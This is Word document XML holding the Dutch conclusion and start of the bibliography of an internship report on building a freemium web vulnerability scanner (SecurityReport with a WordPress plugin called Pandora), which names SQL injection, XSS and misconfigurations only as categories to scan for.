                <wp:wrapNone/>
                <wp:docPr id="841" name="Rectangle 84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05185" id="Rectangle 841" o:spid="_x0000_s1026" style="position:absolute;margin-left:-70.8pt;margin-top:-65.25pt;width:25pt;height:1031.7pt;z-index:-2500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" fillcolor="#e7e6e6 [3214]" strokecolor="#e7e6e6 [3214]" strokeweight="1pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D6D44CB" w14:textId="053D3F20" w:rsidR="00344273" w:rsidRPr="00AC06C2" w:rsidRDefault="00AC06C2" w:rsidP="002B4BAC">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r w:rsidRPr="00AC06C2">
        <w:t>Eindconclusie</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65F2E486" w14:textId="50375C47" w:rsidR="002B21CF" w:rsidRDefault="004432D2">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="253237248" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="0CBEF51F" wp14:editId="6A99D8A0">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-10795</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>216535</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="5778500" cy="7769860"/>
                <wp:effectExtent l="0" t="0" r="0" b="2540"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="800" name="Text Box 800"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr txBox="1"/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="5778500" cy="7769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544C3" w14:textId="44394A89" w:rsidR="002A05E5" w:rsidRDefault="002A05E5">
                            <w:r>
                              <w:t>A</w:t>
                            </w:r>
                            <w:r w:rsidR="00E8228B">
                              <w:t>an de hand van het</w:t>
                            </w:r>
                            <w:r>
                              <w:t xml:space="preserve"> onde</w:t>
                            </w:r>
                            <w:r w:rsidR="006440C7">
                              <w:t>rzoek en Proof of Concept zal er antwoord gegeven worden</w:t>
                            </w:r>
                            <w:r>
                              <w:t xml:space="preserve"> op de onderstaande hoofdvraag die aan het begin van dit project is vastgesteld.</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="27EEB0F3" w14:textId="77777777" w:rsidR="002A05E5" w:rsidRDefault="002A05E5" w:rsidP="004432D2">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2E76E415" w14:textId="77777777" w:rsidR="002A05E5" w:rsidRDefault="002A05E5">
                            <w:pPr>
                              <w:contextualSpacing/>
                            </w:pPr>
                          </w:p>
                          <w:p w14:paraId="5BF5AE5A" w14:textId="6F37D903" w:rsidR="002A05E5" w:rsidRDefault="00A83456">
                            <w:pPr>
                              <w:contextualSpacing/>
                            </w:pPr>
                            <w:r>
                              <w:t>Hiervoor is er</w:t>
                            </w:r>
                            <w:r w:rsidR="002A05E5">
                              <w:t xml:space="preserve"> onderzoek gedaan naar drie onderwerpen. De drie onderwerpen zijn: web kwetsbaarheden, webapplicatie scanners en technologieën. </w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="47EE461C" w14:textId="77777777" w:rsidR="002A05E5" w:rsidRDefault="002A05E5">
                            <w:pPr>
                              <w:contextualSpacing/>
                            </w:pPr>
                          </w:p>
                          <w:p w14:paraId="69E0B1EF" w14:textId="19101647" w:rsidR="002A05E5" w:rsidRDefault="002A05E5">
                            <w:pPr>
                              <w:contextualSpacing/>
                            </w:pPr>
                            <w:r>
                              <w:t>Een webapplicatie scanner scant op kwetsbaarheden die zich bevinden op websites. Het doel van het onderzoek is om een selectie te maken van web kwetsbaarheden waar de webapplicatie scanner op zal scannen. Uit het onderzoek naar web kwe</w:t>
                            </w:r>
                            <w:r w:rsidR="0025710E">
                              <w:t>tsbaarheden is gebleken dat SQL-</w:t>
                            </w:r>
                            <w:r>
                              <w:t>injectie (A1/WACS-19), Cross-site Scripting (A3/WACS-8) en Misconfiguraties (A5/WACS-13, 14 en 15). Deze behoren tot meest voorkomende kwetsbaarheden. Bij het exploiteren van deze kwetsbaarheden kunnen websites veel schade oplopen omdat zij directe dreiging kunne</w:t>
                            </w:r>
                            <w:r w:rsidR="00F30E7E">
                              <w:t>n uitoefen op een database. De</w:t>
                            </w:r>
                            <w:r>
                              <w:t xml:space="preserve"> selectie is gebaseerd op drie punten, hoe vaak een kwetsbaarheid voorkomst op een website, hoe veel schade het kan aanrichten en de moeilijkheidsgraad van het detecteren ervan.</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="1B046D6D" w14:textId="77777777" w:rsidR="002A05E5" w:rsidRDefault="002A05E5">
                            <w:pPr>
                              <w:contextualSpacing/>
                            </w:pPr>
                          </w:p>
                          <w:p w14:paraId="7A1F920D" w14:textId="66537C9E" w:rsidR="002A05E5" w:rsidRDefault="002240B7">
                            <w:pPr>
                              <w:contextualSpacing/>
                            </w:pPr>
                            <w:r>
                              <w:t>Voor het onderzoek was het</w:t>
                            </w:r>
                            <w:r w:rsidR="002A05E5">
                              <w:t xml:space="preserve"> nog niet</w:t>
                            </w:r>
                            <w:r>
                              <w:t xml:space="preserve"> bekent wat </w:t>
                            </w:r>
                            <w:r w:rsidR="002A05E5">
                              <w:t>precies een weba</w:t>
                            </w:r>
                            <w:r w:rsidR="005D3AE0">
                              <w:t>pplicatie scanner is en doet, het</w:t>
                            </w:r>
                            <w:r w:rsidR="002A05E5">
                              <w:t xml:space="preserve"> doel </w:t>
                            </w:r>
                            <w:r w:rsidR="00DC67FD">
                              <w:t xml:space="preserve">om er onderzoek naar te doen. In het onderzoek zijn er </w:t>
                            </w:r>
                            <w:r w:rsidR="002A05E5">
                              <w:t>twee webapplicatie scanners</w:t>
                            </w:r>
                            <w:r w:rsidR="00DC67FD">
                              <w:t xml:space="preserve"> onderzocht</w:t>
                            </w:r>
                            <w:r w:rsidR="002A05E5">
                              <w:t xml:space="preserve"> </w:t>
                            </w:r>
                            <w:r w:rsidR="007B5532">
                              <w:t>om er</w:t>
                            </w:r>
                            <w:r w:rsidR="008133F7">
                              <w:t>achter te komen</w:t>
                            </w:r>
                            <w:r w:rsidR="007B5532">
                              <w:t xml:space="preserve"> waar uit een webapplicatie scanner gebouwd</w:t>
                            </w:r>
                            <w:r w:rsidR="002A05E5">
                              <w:t xml:space="preserve"> </w:t>
                            </w:r>
                            <w:r w:rsidR="007B5532">
                              <w:t xml:space="preserve">is </w:t>
                            </w:r>
                            <w:r w:rsidR="002A05E5">
                              <w:t>en wat de werking ervan is. Ik heb uit een lijst</w:t>
                            </w:r>
                            <w:r w:rsidR="0097066F">
                              <w:t xml:space="preserve"> van 40 webapplicaties twee uit</w:t>
                            </w:r>
                            <w:r w:rsidR="002A05E5">
                              <w:t>gekozen</w:t>
                            </w:r>
                            <w:r w:rsidR="007B65C1">
                              <w:t xml:space="preserve"> </w:t>
                            </w:r>
                            <w:bookmarkStart w:id="0" w:name="_GoBack"/>
                            <w:bookmarkEnd w:id="0"/>
                            <w:r w:rsidR="002A05E5">
                              <w:t xml:space="preserve">op basis van de volgende kenmerken </w:t>
                            </w:r>
                            <w:r w:rsidR="002A05E5" w:rsidRPr="00910A6E">
                              <w:rPr>
                                <w:b/>
                              </w:rPr>
                              <w:t>Technologie</w:t>
                            </w:r>
                            <w:r w:rsidR="002A05E5">
                              <w:t xml:space="preserve">, </w:t>
                            </w:r>
                            <w:r w:rsidR="002A05E5">
                              <w:rPr>
                                <w:b/>
                              </w:rPr>
                              <w:t>Documentatie</w:t>
                            </w:r>
                            <w:r w:rsidR="002A05E5" w:rsidRPr="000B38E8">
                              <w:t>,</w:t>
                            </w:r>
                            <w:r w:rsidR="002A05E5">
                              <w:rPr>
                                <w:b/>
                              </w:rPr>
                              <w:t xml:space="preserve"> </w:t>
                            </w:r>
                            <w:r w:rsidR="002A05E5" w:rsidRPr="00825CB6">
                              <w:rPr>
                                <w:b/>
                              </w:rPr>
                              <w:t>Verkrijgbaarheid</w:t>
                            </w:r>
                            <w:r w:rsidR="002A05E5" w:rsidRPr="005C4102">
                              <w:t>.</w:t>
                            </w:r>
                            <w:r w:rsidR="002A05E5">
                              <w:t xml:space="preserve"> Mijn keuze voor dit onderzoek is gevallen op Acunetix en OWASP ZAP, deze twee webapplicatie scanners zijn voorlopers op het gebied van security scans en zij zijn relatief makkelijk te installeren ten opzichte van hun soortgenoten. Ook kunnen zij mij veel inzicht geven in de werking van een webapplicatie scanner. Uit het onderzoek is gebleken wat de fundamentele componenten zijn van een webapplicatie scanner, ik heb mijn voorpagina met deze componenten versierd en hoe elke component in zijn werking gaat.</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="3250AB92" w14:textId="77777777" w:rsidR="002A05E5" w:rsidRDefault="002A05E5">
                            <w:pPr>
                              <w:contextualSpacing/>
                            </w:pPr>
                          </w:p>
                          <w:p w14:paraId="4220A2AB" w14:textId="7A417FD3" w:rsidR="002A05E5" w:rsidRPr="007C4606" w:rsidRDefault="002A05E5">
                            <w:pPr>
                              <w:contextualSpacing/>
                            </w:pPr>
                            <w:r>
                              <w:t>Ik heb ook mijn onderzoek gericht op het gebied van ontwikkelomgevingen, met andere woorden programmeer frameworks. Ik heb in de inleiding een disclaimer geplaats met uitleg ove</w:t>
                            </w:r>
                            <w:r w:rsidR="004C7CC5">
                              <w:t>r het feit dat S5 vooral PHP-</w:t>
                            </w:r>
                            <w:r>
                              <w:t>ontwikkelaars in huis heeft. Hierom heb ik mijn opties beperkt tot alleen PHP Frameworks. Uit het onderzoek is gebleken dat de Laravel Framework het meest geschikt is voor dit project, dit op basis van ontwikkel tools en flexibiliteit van de Framework.</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="030867A7" w14:textId="77777777" w:rsidR="002A05E5" w:rsidRDefault="002A05E5">
                            <w:pPr>
                              <w:contextualSpacing/>
                            </w:pPr>
                          </w:p>
                          <w:p w14:paraId="747D291D" w14:textId="7F0F32D2" w:rsidR="002A05E5" w:rsidRDefault="002A05E5">
                            <w:pPr>
                              <w:contextualSpacing/>
                            </w:pPr>
                            <w:r>
                              <w:t>Deze drie onderzoeken vormden de basis van het concept dat ik tijdens mijn afstudeerstage heb ontwikkeld. SecurityReport, een geautomatiseerde webapplicatie scanner die bediend wordt met een Wordpress Extensie met de naam Pandora die op basis van het verdienmodel Freemium zorgt voor leads (potentiele nieuwe klanten) en een gratis scan aanbiedt aan klanten die een website bij S5 laten bouwen. Het Proof of Concept is over mijn stageperiode meedere malen getest (Bijlage, Test resultaten) en uit deze test is gebleken dat het inderdaad bewijst dat het kwetsbaarheden kan identificeren op websites.</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="2B4AF865" w14:textId="77777777" w:rsidR="002A05E5" w:rsidRDefault="002A05E5"/>
                          <w:p w14:paraId="4D2A2CE5" w14:textId="77777777" w:rsidR="002A05E5" w:rsidRDefault="002A0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EF51F" id="Text Box 800" o:spid="_x0000_s1263" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:-.85pt;margin-top:17.05pt;width:455pt;height:611.8pt;z-index:2532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t8c3wCAABnBQAADgAAAGRycy9lMm9Eb2MueG1srFTdT9swEH+ftP/B8vtI2wEt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" filled="f" stroked="f">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="70C544C3" w14:textId="44394A89" w:rsidR="002A05E5" w:rsidRDefault="002A05E5">
                      <w:r>
                        <w:t>A</w:t>
                      </w:r>
                      <w:r w:rsidR="00E8228B">
                        <w:t>an de hand van het</w:t>
                      </w:r>
                      <w:r>
                        <w:t xml:space="preserve"> onde</w:t>
                      </w:r>
                      <w:r w:rsidR="006440C7">
                        <w:t>rzoek en Proof of Concept zal er antwoord gegeven worden</w:t>
                      </w:r>
                      <w:r>
                        <w:t xml:space="preserve"> op de onderstaande hoofdvraag die aan het begin van dit project is vastgesteld.</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="27EEB0F3" w14:textId="77777777" w:rsidR="002A05E5" w:rsidRDefault="002A05E5" w:rsidP="004432D2">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2E76E415" w14:textId="77777777" w:rsidR="002A05E5" w:rsidRDefault="002A05E5">
                      <w:pPr>
                        <w:contextualSpacing/>
                      </w:pPr>
                    </w:p>
                    <w:p w14:paraId="5BF5AE5A" w14:textId="6F37D903" w:rsidR="002A05E5" w:rsidRDefault="00A83456">
                      <w:pPr>
                        <w:contextualSpacing/>
                      </w:pPr>
                      <w:r>
                        <w:t>Hiervoor is er</w:t>
                      </w:r>
                      <w:r w:rsidR="002A05E5">
                        <w:t xml:space="preserve"> onderzoek gedaan naar drie onderwerpen. De drie onderwerpen zijn: web kwetsbaarheden, webapplicatie scanners en technologieën. </w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="47EE461C" w14:textId="77777777" w:rsidR="002A05E5" w:rsidRDefault="002A05E5">
                      <w:pPr>
                        <w:contextualSpacing/>
                      </w:pPr>
                    </w:p>
                    <w:p w14:paraId="69E0B1EF" w14:textId="19101647" w:rsidR="002A05E5" w:rsidRDefault="002A05E5">
                      <w:pPr>
                        <w:contextualSpacing/>
                      </w:pPr>
                      <w:r>
                        <w:t>Een webapplicatie scanner scant op kwetsbaarheden die zich bevinden op websites. Het doel van het onderzoek is om een selectie te maken van web kwetsbaarheden waar de webapplicatie scanner op zal scannen. Uit het onderzoek naar web kwe</w:t>
                      </w:r>
                      <w:r w:rsidR="0025710E">
                        <w:t>tsbaarheden is gebleken dat SQL-</w:t>
                      </w:r>
                      <w:r>
                        <w:t>injectie (A1/WACS-19), Cross-site Scripting (A3/WACS-8) en Misconfiguraties (A5/WACS-13, 14 en 15). Deze behoren tot meest voorkomende kwetsbaarheden. Bij het exploiteren van deze kwetsbaarheden kunnen websites veel schade oplopen omdat zij directe dreiging kunne</w:t>
                      </w:r>
                      <w:r w:rsidR="00F30E7E">
                        <w:t>n uitoefen op een database. De</w:t>
                      </w:r>
                      <w:r>
                        <w:t xml:space="preserve"> selectie is gebaseerd op drie punten, hoe vaak een kwetsbaarheid voorkomst op een website, hoe veel schade het kan aanrichten en de moeilijkheidsgraad van het detecteren ervan.</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="1B046D6D" w14:textId="77777777" w:rsidR="002A05E5" w:rsidRDefault="002A05E5">
                      <w:pPr>
                        <w:contextualSpacing/>
                      </w:pPr>
                    </w:p>
                    <w:p w14:paraId="7A1F920D" w14:textId="66537C9E" w:rsidR="002A05E5" w:rsidRDefault="002240B7">
                      <w:pPr>
                        <w:contextualSpacing/>
                      </w:pPr>
                      <w:r>
                        <w:t>Voor het onderzoek was het</w:t>
                      </w:r>
                      <w:r w:rsidR="002A05E5">
                        <w:t xml:space="preserve"> nog niet</w:t>
                      </w:r>
                      <w:r>
                        <w:t xml:space="preserve"> bekent wat </w:t>
                      </w:r>
                      <w:r w:rsidR="002A05E5">
                        <w:t>precies een weba</w:t>
                      </w:r>
                      <w:r w:rsidR="005D3AE0">
                        <w:t>pplicatie scanner is en doet, het</w:t>
                      </w:r>
                      <w:r w:rsidR="002A05E5">
                        <w:t xml:space="preserve"> doel </w:t>
                      </w:r>
                      <w:r w:rsidR="00DC67FD">
                        <w:t xml:space="preserve">om er onderzoek naar te doen. In het onderzoek zijn er </w:t>
                      </w:r>
                      <w:r w:rsidR="002A05E5">
                        <w:t>twee webapplicatie scanners</w:t>
                      </w:r>
                      <w:r w:rsidR="00DC67FD">
                        <w:t xml:space="preserve"> onderzocht</w:t>
                      </w:r>
                      <w:r w:rsidR="002A05E5">
                        <w:t xml:space="preserve"> </w:t>
                      </w:r>
                      <w:r w:rsidR="007B5532">
                        <w:t>om er</w:t>
                      </w:r>
                      <w:r w:rsidR="008133F7">
                        <w:t>achter te komen</w:t>
                      </w:r>
                      <w:r w:rsidR="007B5532">
                        <w:t xml:space="preserve"> waar uit een webapplicatie scanner gebouwd</w:t>
                      </w:r>
                      <w:r w:rsidR="002A05E5">
                        <w:t xml:space="preserve"> </w:t>
                      </w:r>
                      <w:r w:rsidR="007B5532">
                        <w:t xml:space="preserve">is </w:t>
                      </w:r>
                      <w:r w:rsidR="002A05E5">
                        <w:t>en wat de werking ervan is. Ik heb uit een lijst</w:t>
                      </w:r>
                      <w:r w:rsidR="0097066F">
                        <w:t xml:space="preserve"> van 40 webapplicaties twee uit</w:t>
                      </w:r>
                      <w:r w:rsidR="002A05E5">
                        <w:t>gekozen</w:t>
                      </w:r>
                      <w:r w:rsidR="007B65C1">
                        <w:t xml:space="preserve"> </w:t>
                      </w:r>
                      <w:bookmarkStart w:id="1" w:name="_GoBack"/>
                      <w:bookmarkEnd w:id="1"/>
                      <w:r w:rsidR="002A05E5">
                        <w:t xml:space="preserve">op basis van de volgende kenmerken </w:t>
                      </w:r>
                      <w:r w:rsidR="002A05E5" w:rsidRPr="00910A6E">
                        <w:rPr>
                          <w:b/>
                        </w:rPr>
                        <w:t>Technologie</w:t>
                      </w:r>
                      <w:r w:rsidR="002A05E5">
                        <w:t xml:space="preserve">, </w:t>
                      </w:r>
                      <w:r w:rsidR="002A05E5">
                        <w:rPr>
                          <w:b/>
                        </w:rPr>
                        <w:t>Documentatie</w:t>
                      </w:r>
                      <w:r w:rsidR="002A05E5" w:rsidRPr="000B38E8">
                        <w:t>,</w:t>
                      </w:r>
                      <w:r w:rsidR="002A05E5">
                        <w:rPr>
                          <w:b/>
                        </w:rPr>
                        <w:t xml:space="preserve"> </w:t>
                      </w:r>
                      <w:r w:rsidR="002A05E5" w:rsidRPr="00825CB6">
                        <w:rPr>
                          <w:b/>
                        </w:rPr>
                        <w:t>Verkrijgbaarheid</w:t>
                      </w:r>
                      <w:r w:rsidR="002A05E5" w:rsidRPr="005C4102">
                        <w:t>.</w:t>
                      </w:r>
                      <w:r w:rsidR="002A05E5">
                        <w:t xml:space="preserve"> Mijn keuze voor dit onderzoek is gevallen op Acunetix en OWASP ZAP, deze twee webapplicatie scanners zijn voorlopers op het gebied van security scans en zij zijn relatief makkelijk te installeren ten opzichte van hun soortgenoten. Ook kunnen zij mij veel inzicht geven in de werking van een webapplicatie scanner. Uit het onderzoek is gebleken wat de fundamentele componenten zijn van een webapplicatie scanner, ik heb mijn voorpagina met deze componenten versierd en hoe elke component in zijn werking gaat.</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="3250AB92" w14:textId="77777777" w:rsidR="002A05E5" w:rsidRDefault="002A05E5">
                      <w:pPr>
                        <w:contextualSpacing/>
                      </w:pPr>
                    </w:p>
                    <w:p w14:paraId="4220A2AB" w14:textId="7A417FD3" w:rsidR="002A05E5" w:rsidRPr="007C4606" w:rsidRDefault="002A05E5">
                      <w:pPr>
                        <w:contextualSpacing/>
                      </w:pPr>
                      <w:r>
                        <w:t>Ik heb ook mijn onderzoek gericht op het gebied van ontwikkelomgevingen, met andere woorden programmeer frameworks. Ik heb in de inleiding een disclaimer geplaats met uitleg ove</w:t>
                      </w:r>
                      <w:r w:rsidR="004C7CC5">
                        <w:t>r het feit dat S5 vooral PHP-</w:t>
                      </w:r>
                      <w:r>
                        <w:t>ontwikkelaars in huis heeft. Hierom heb ik mijn opties beperkt tot alleen PHP Frameworks. Uit het onderzoek is gebleken dat de Laravel Framework het meest geschikt is voor dit project, dit op basis van ontwikkel tools en flexibiliteit van de Framework.</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="030867A7" w14:textId="77777777" w:rsidR="002A05E5" w:rsidRDefault="002A05E5">
                      <w:pPr>
                        <w:contextualSpacing/>
                      </w:pPr>
                    </w:p>
                    <w:p w14:paraId="747D291D" w14:textId="7F0F32D2" w:rsidR="002A05E5" w:rsidRDefault="002A05E5">
                      <w:pPr>
                        <w:contextualSpacing/>
                      </w:pPr>
                      <w:r>
                        <w:t>Deze drie onderzoeken vormden de basis van het concept dat ik tijdens mijn afstudeerstage heb ontwikkeld. SecurityReport, een geautomatiseerde webapplicatie scanner die bediend wordt met een Wordpress Extensie met de naam Pandora die op basis van het verdienmodel Freemium zorgt voor leads (potentiele nieuwe klanten) en een gratis scan aanbiedt aan klanten die een website bij S5 laten bouwen. Het Proof of Concept is over mijn stageperiode meedere malen getest (Bijlage, Test resultaten) en uit deze test is gebleken dat het inderdaad bewijst dat het kwetsbaarheden kan identificeren op websites.</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="2B4AF865" w14:textId="77777777" w:rsidR="002A05E5" w:rsidRDefault="002A05E5"/>
                    <w:p w14:paraId="4D2A2CE5" w14:textId="77777777" w:rsidR="002A05E5" w:rsidRDefault="002A05E5"/>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap type="square"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="48BA6D0D" w14:textId="17B5D6C8" w:rsidR="00443E7D" w:rsidRDefault="00443E7D">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:smallCaps/>
          <w:spacing w:val="5"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D846ECE" w14:textId="067E4BFD" w:rsidR="00886D84" w:rsidRPr="0089550C" w:rsidRDefault="007460D6" w:rsidP="001876C7">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="253241344" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="04F9A5E4" wp14:editId="07B0CBB2">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-904875</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>-895350</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="317500" cy="13102731"/>
                <wp:effectExtent l="0" t="0" r="38100" b="29210"/>
                <wp:wrapNone/>
                <wp:docPr id="843" name="Rectangle 84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4A912" id="Rectangle 843" o:spid="_x0000_s1026" style="position:absolute;margin-left:-71.25pt;margin-top:-70.45pt;width:25pt;height:1031.7pt;z-index:-2500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" fillcolor="#e7e6e6 [3214]" strokecolor="#e7e6e6 [3214]" strokeweight="1pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00886D84" w:rsidRPr="0089550C">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Bronnenlijst</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AFB14B2" w14:textId="34D9D27E" w:rsidR="007D3A19" w:rsidRPr="0030691F" w:rsidRDefault="007D3A19" w:rsidP="007D3A19">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4EDA7A7B" w14:textId="77777777" w:rsidR="00D877E4" w:rsidRDefault="00B534F2" w:rsidP="00083203">
      <w:pPr>
        <w:contextualSpacing/>
      </w:pPr>
      <w:r w:rsidRPr="00CC5BFC">
        <w:t xml:space="preserve">Securi </w:t>
      </w:r>
      <w:r w:rsidR="00257E5A" w:rsidRPr="00CC5BFC">
        <w:t>(2016). Website Hacked Trend Report.</w:t>
      </w:r>
      <w:r w:rsidR="00921538" w:rsidRPr="00CC5BFC">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00CC5BFC">
        <w:t>Geraadpleegd van</w:t>
      </w:r>
      <w:r w:rsidR="002E7D5C" w:rsidRPr="00CC5BFC">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C9B9FB1" w14:textId="2E99986D" w:rsidR="00886D84" w:rsidRDefault="002A05E5" w:rsidP="00083203">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId122" w:history="1">
        <w:r w:rsidR="00886D84" w:rsidRPr="00CC5BFC">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:lang w:val="en-GB"/>
          </w:rPr>
          <w:t>https://sucuri.net/website-security/Reports/Sucuri-Website-Hacked-Report-2016Q1.pdf</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="0BB4221A" w14:textId="77777777" w:rsidR="0030691F" w:rsidRPr="00CC5BFC" w:rsidRDefault="0030691F" w:rsidP="00083203">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="15C703FD" w14:textId="77777777" w:rsidR="0030691F" w:rsidRDefault="00B534F2" w:rsidP="00083203">
      <w:pPr>
        <w:contextualSpacing/>
      </w:pPr>
      <w:r w:rsidRPr="00CC5BFC">
        <w:t>IBM Security (Maart, 2017). IBM X-Force Threat Intelligence Index 2017. Geraadpleegd van</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="694A0E62" w14:textId="0EF0C985" w:rsidR="00886D84" w:rsidRDefault="00B534F2" w:rsidP="00083203">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CC5BFC">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:hyperlink r:id="rId123" w:history="1">
        <w:r w:rsidR="00886D84" w:rsidRPr="00CC5BFC">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:lang w:val="en-GB"/>
          </w:rPr>
          <w:t>https://assets.documentcloud.org/documents/3527813/IBM-XForce-Index-2017-FINAL.pdf</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="188D0774" w14:textId="77777777" w:rsidR="0030691F" w:rsidRPr="00CC5BFC" w:rsidRDefault="0030691F" w:rsidP="00083203">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2BEDD95F" w14:textId="77777777" w:rsidR="0030691F" w:rsidRDefault="00B534F2" w:rsidP="00083203">
      <w:pPr>
        <w:contextualSpacing/>
      </w:pPr>
      <w:r w:rsidRPr="00CC5BFC">
        <w:t xml:space="preserve">IBM Security (2014). IBM X-Force Threat Intelligence Quarterly </w:t>
      </w:r>
      <w:r w:rsidR="00FF0482" w:rsidRPr="00CC5BFC">
        <w:t>2Q 2014. Geraadpleegd van</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5916B192" w14:textId="5EB8D313" w:rsidR="00886D84" w:rsidRDefault="00FF0482" w:rsidP="00083203">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CC5BFC">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00B534F2" w:rsidRPr="00CC5BFC">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId124" w:history="1">
        <w:r w:rsidR="00886D84" w:rsidRPr="00CC5BFC">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:lang w:val="en-GB"/>
          </w:rPr>
          <w:t>http://essextec.com/wp-content/uploads/2015/09/xforcereport2q2014.pdf</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="7563B5F8" w14:textId="77777777" w:rsidR="0030691F" w:rsidRPr="00CC5BFC" w:rsidRDefault="0030691F" w:rsidP="00083203">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="73865744" w14:textId="77777777" w:rsidR="0030691F" w:rsidRDefault="00C674E1" w:rsidP="00083203">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:u w:val="none"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CC5BFC">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:u w:val="none"/>
